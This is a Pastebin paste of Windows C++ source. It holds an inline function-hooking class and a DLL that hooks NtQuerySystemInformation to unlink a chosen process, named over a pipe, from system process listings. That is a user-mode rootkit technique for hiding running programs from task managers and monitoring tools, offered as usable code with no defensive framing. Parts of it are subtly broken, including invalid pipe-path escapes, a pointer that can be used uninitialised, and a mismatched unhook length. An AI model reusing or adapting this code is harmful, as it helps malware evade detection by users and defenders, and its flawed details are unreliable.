Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "FunctionHooker.h"
- #include <Windows.h>
- int FunctionHooker::HookFunction32(void* hookedFunctionAddress, void* replacementFunctionAddress, HookStruct32* hook)
- {
- if (hook->Valid)
- {
- return 0;
- }
- int replacementAddress = (int)replacementFunctionAddress;
- int offset = 0;
- unsigned char lastByte = 0;
- SIZE_T numWritten = 0;
- if (!ReadProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->OriginalBytes, 6, NULL))
- {
- return 0;
- }
- hook->OriginalFunction = VirtualAlloc(0, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (!hook->OriginalFunction)
- {
- return 0;
- }
- if (!RtlSecureZeroMemory(hook->OriginalFunction, 1024))
- {
- return 0;
- }
- hook->ReplacementBytes[0] = 0x68; // push
- hook->ReplacementBytes[5] = 0xc3; // retn
- if (!WriteProcessMemory(GetCurrentProcess(), hook->ReplacementBytes + 1, &replacementAddress, 4, NULL))
- {
- return 0;
- }
- do
- {
- if (!WriteProcessMemory(GetCurrentProcess(), ((char*)hook->OriginalFunction) + offset, ((char*)hookedFunctionAddress) + offset, 1, &numWritten))
- {
- return 0;
- }
- if (offset > 0)
- {
- lastByte = *(((char*)hook->OriginalFunction) + offset - 1);
- if (lastByte == 0xc2)
- {
- break;
- }
- }
- lastByte = *(((char*)hook->OriginalFunction) + offset);
- if (lastByte == 0xc3)
- {
- break;
- }
- offset += numWritten;
- if (offset > 1024)
- {
- return 0;
- }
- } while (1);
- if (!WriteProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->ReplacementBytes, 6, NULL))
- {
- return 0;
- }
- hook->OriginalFunctionAddress = hookedFunctionAddress;
- hook->Valid = 1;
- return 1;
- }
- int FunctionHooker::HookFunction64(void* hookedFunctionAddress, void* replacementFunctionAddress, HookStruct64* hook)
- {
- if (hook->Valid)
- {
- return 0;
- }
- long long replacementAddress = (long long)replacementFunctionAddress;
- int offset = 0;
- unsigned char lastByte = 0;
- SIZE_T numWritten = 0;
- if (!ReadProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->OriginalBytes, 12, NULL))
- {
- return 0;
- }
- hook->OriginalFunction = VirtualAlloc(0, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (!hook->OriginalFunction)
- {
- return 0;
- }
- if (!RtlSecureZeroMemory(hook->OriginalFunction, 1024))
- {
- return 0;
- }
- hook->ReplacementBytes[0] = 0x48; // using 64 bit operand
- hook->ReplacementBytes[1] = 0xb8; // mov rax
- hook->ReplacementBytes[10] = 0x50; // push rax
- hook->ReplacementBytes[11] = 0xc3; // retn
- if (!WriteProcessMemory(GetCurrentProcess(), hook->ReplacementBytes + 2, &replacementAddress, 8, NULL))
- {
- return 0;
- }
- do
- {
- if (!WriteProcessMemory(GetCurrentProcess(), ((char*)hook->OriginalFunction) + offset, ((char*)hookedFunctionAddress) + offset, 1, &numWritten))
- {
- return 0;
- }
- if (offset > 0)
- {
- lastByte = *(((char*)hook->OriginalFunction) + offset - 1);
- if (lastByte == 0xc2)
- {
- break;
- }
- }
- lastByte = *(((char*)hook->OriginalFunction) + offset);
- if (lastByte == 0xc3)
- {
- break;
- }
- offset += numWritten;
- if (offset > 1024)
- {
- return 0;
- }
- } while (1);
- if (!WriteProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->ReplacementBytes, 12, NULL))
- {
- return 0;
- }
- hook->OriginalFunctionAddress = hookedFunctionAddress;
- hook->Valid = 1;
- return 1;
- }
- int FunctionHooker::UnhookFunction32(HookStruct32* hook)
- {
- if (hook->Valid)
- {
- if (WriteProcessMemory(GetCurrentProcess(), hook->OriginalFunctionAddress, hook->OriginalBytes, 6, NULL))
- {
- hook->Valid = 0;
- if (VirtualFree(hook->OriginalFunction, 0, MEM_RELEASE))
- {
- return 1;
- }
- return 0;
- }
- }
- return 0;
- }
- int FunctionHooker::UnhookFunction64(HookStruct64* hook)
- {
- if (hook->Valid)
- {
- if (WriteProcessMemory(GetCurrentProcess(), hook->OriginalFunctionAddress, hook->OriginalBytes, 10, NULL))
- {
- hook->Valid = 0;
- if (VirtualFree(hook->OriginalFunction, 0, MEM_RELEASE))
- {
- return 1;
- }
- return 0;
- }
- }
- return 0;
- }
- #pragma once
- struct HookStruct32
- {
- char Valid = 0;
- char OriginalBytes[6];
- char ReplacementBytes[6];
- void* OriginalFunction;
- void* OriginalFunctionAddress;
- };
- struct HookStruct64
- {
- char Valid = 0;
- char OriginalBytes[12];
- char ReplacementBytes[12];
- void* OriginalFunction;
- void* OriginalFunctionAddress;
- };
- #include <Windows.h>
- #include "FunctionHooker.h"
- #include <winternl.h>
- #include "Console.h"
- #if _WIN64
- #define HookStruct HookStruct64
- #elif _WIN32
- #define HookStruct HookStruct32
- #endif
- #ifndef HookStruct
- #error Not compiling on x86 or x64...
- #endif
- HookStruct hookData;
- UNICODE_STRING hiddenName;
- Console con;
- typedef NTSTATUS (*_OriginalNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
- typedef void(*_RtlInitAnsiString)(PANSI_STRING, PCSZ);
- typedef NTSTATUS(*_RtlAnsiStringToUnicodeString)(PUNICODE_STRING, PCANSI_STRING, BOOL);
- NTSTATUS __stdcall MyNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
- {
- _OriginalNtQuerySystemInformation OriginalNtQuerySystemInformation = (_OriginalNtQuerySystemInformation) hookData.OriginalFunction;
- NTSTATUS result = OriginalNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
- if (SystemInformationLength <= 0)
- {
- return result;
- }
- if (SystemInformationClass == SystemProcessInformation)
- {
- SYSTEM_PROCESS_INFORMATION* processInfo;
- SYSTEM_PROCESS_INFORMATION* previousProcessInfo;
- char* systemInformationBuffer = (char*) SystemInformation;
- int offset = 0;
- do
- {
- processInfo = ((SYSTEM_PROCESS_INFORMATION*) (systemInformationBuffer + offset));
- if (lstrcmpiW(processInfo->ImageName.Buffer, hiddenName.Buffer) == 0)
- {
- if (processInfo->NextEntryOffset == 0)
- {
- previousProcessInfo->NextEntryOffset = 0;
- }
- else
- {
- unsigned long nextOffset = previousProcessInfo->NextEntryOffset;
- nextOffset += processInfo->NextEntryOffset;
- previousProcessInfo->NextEntryOffset = nextOffset;
- }
- }
- previousProcessInfo = processInfo;
- offset += processInfo->NextEntryOffset;
- } while (processInfo->NextEntryOffset != 0);
- }
- return result;
- }
- BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
- {
- HANDLE pipe = INVALID_HANDLE_VALUE;
- FunctionHooker hooker;
- HMODULE ntdllBase;
- BOOL isWowProcess;
- BOOL wowCheckFailed = 0;
- void* ntQueryAddr;
- void* rtlInitAddr;
- void* rtlAnsiToUnicodeAddr;
- switch (ul_reason_for_call)
- {
- case DLL_PROCESS_ATTACH:
- ntdllBase = LoadLibraryA("ntdll.dll");
- ntQueryAddr = GetProcAddress(ntdllBase, "NtQuerySystemInformation");
- rtlInitAddr = GetProcAddress(ntdllBase, "RtlInitAnsiString");
- rtlAnsiToUnicodeAddr = GetProcAddress(ntdllBase, "RtlAnsiStringToUnicodeString");
- pipe = CreateFileW(L"\\.\pipe\UnmanagerPipe", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
- if (pipe != INVALID_HANDLE_VALUE)
- {
- DWORD bytesRead;
- char readBuffer[MAX_PATH];
- while (!ReadFile(pipe, readBuffer, MAX_PATH, &bytesRead, NULL))
- {
- Sleep(5);
- }
- _RtlInitAnsiString MyRtlInitAnsiString;
- _RtlAnsiStringToUnicodeString MyRtlAnsiStringToUnicodeString;
- if (rtlInitAddr)
- {
- MyRtlInitAnsiString = (_RtlInitAnsiString) rtlInitAddr;
- if (rtlAnsiToUnicodeAddr)
- {
- MyRtlAnsiStringToUnicodeString = (_RtlAnsiStringToUnicodeString) rtlAnsiToUnicodeAddr;
- ANSI_STRING originalString;
- MyRtlInitAnsiString(&originalString, readBuffer);
- NTSTATUS status = MyRtlAnsiStringToUnicodeString(&hiddenName, &originalString, true);
- if (NT_SUCCESS(status))
- {
- if (ntQueryAddr)
- {
- #if _WIN64
- hooker.HookFunction64(ntQueryAddr, &MyNtQuerySystemInformation, &hookData);
- #elif _WIN32
- hooker.HookFunction32(ntQueryAddr, &MyNtQuerySystemInformation, &hookData);
- #endif
- }
- }
- }
- }
- CloseHandle(pipe);
- }
- break;
- case DLL_THREAD_ATTACH:
- break;
- case DLL_THREAD_DETACH:
- break;
- case DLL_PROCESS_DETACH:
- break;
- }
- return TRUE;
- }
Add Comment
Please, Sign In to add comment